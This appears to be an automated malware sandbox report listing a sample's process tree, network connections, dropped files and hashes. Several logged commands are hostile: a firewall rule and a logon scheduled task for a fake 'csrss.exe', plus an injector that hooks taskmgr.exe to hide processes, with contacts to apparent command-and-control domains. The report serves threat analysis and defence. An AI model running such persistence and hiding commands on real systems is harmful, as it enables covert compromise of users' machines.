C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 920
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 524
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 488
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1444
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1528
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1612
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4676 -ip 4676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.151:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 151.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.225:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | cf4ea508-d72e-4eb6-87d4-a7de1c0f1efe.ninhaine.com | udp |
| US | 8.8.8.8:53 | server10.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
Files
memory/1116-1-0x0000000005020000-0x0000000005466000-memory.dmp
memory/1116-2-0x0000000005470000-0x0000000005D96000-memory.dmp
memory/1116-3-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/1116-4-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/1116-6-0x0000000005470000-0x0000000005D96000-memory.dmp
memory/4392-7-0x0000000004D40000-0x0000000005181000-memory.dmp
memory/4392-8-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | a38abd5135bd7dd303e36d98b66ba72a |
| SHA1 | f964b8b231631cb299e40565b93afbc39ee37959 |
| SHA256 | fab958b19764e9d129d91caaf0631a76ebc4697a5080d6e331dc27d924621b45 |
| SHA512 | 06032e323cccd5ef99afe6bc1b799a7273c2c82ad843b65af1497847f11093ac33b5d414ed82b4039950f4067f5625badaddc501e501084b5f0da2bfe6f13fdd |
C:\Windows\rss\csrss.exe
| MD5 | fdc2ab5431888ecf6f7c0e674e8812d9 |
| SHA1 | e62c381ac3b782e2f5b82bae97c797757d0e375b |
| SHA256 | fb70708694f1d8d7881fcced3dc6d8319affe8db6ce3bd91591bc1826a22fabe |
| SHA512 | 3b97e3a723fd4cb04a37328bb7f6fe2acd3eaaf470c1161aa61bb7755163f76fbd45b4e46f5a7ab907e61c6056e9e082118d420f17a510761b2b7d62ac67b8d7 |
memory/4392-18-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-19-0x0000000005200000-0x0000000005700000-memory.dmp
memory/4676-20-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-21-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 25475beab23b020b3b25e215333f4db1 |
| SHA1 | dba5b352c8df85dcdef4c7206a8410bbcb32fca8 |
| SHA256 | 451a6c64803fc2257eb8520893dad30e264c3005535f6305bab233797095d096 |
| SHA512 | 8dd0997a8418f10118f99fe72036d633917c6951d4210685d5f38956fe34a10913ee8e7bb02f808defb4d571eeeb086a804fb259b8d3e8d261a4f974662e917a |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 395ae7c9cccebd73de9e6de2d543279d |
| SHA1 | 2805fbce7d93fe5258269247af4033f211561820 |
| SHA256 | 846af15e1c9c6b2e76e87a35943266de1b15ed2564e67bcae7040ecabbde53a6 |
| SHA512 | 063544b4fb4b8b228f39c1ee4b98b2f1c7f091c158793271f18272c23d13a0cc3a87442b02d9887d594a73a80a9adb26c0369126924a66d9541c3335892da892 |
memory/4676-27-0x0000000005200000-0x0000000005700000-memory.dmp
memory/4676-28-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-29-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-30-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-31-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-32-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-33-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-34-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-35-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-36-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-37-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-38-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-39-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/4676-40-0x0000000000400000-0x00000000030EF000-memory.dmp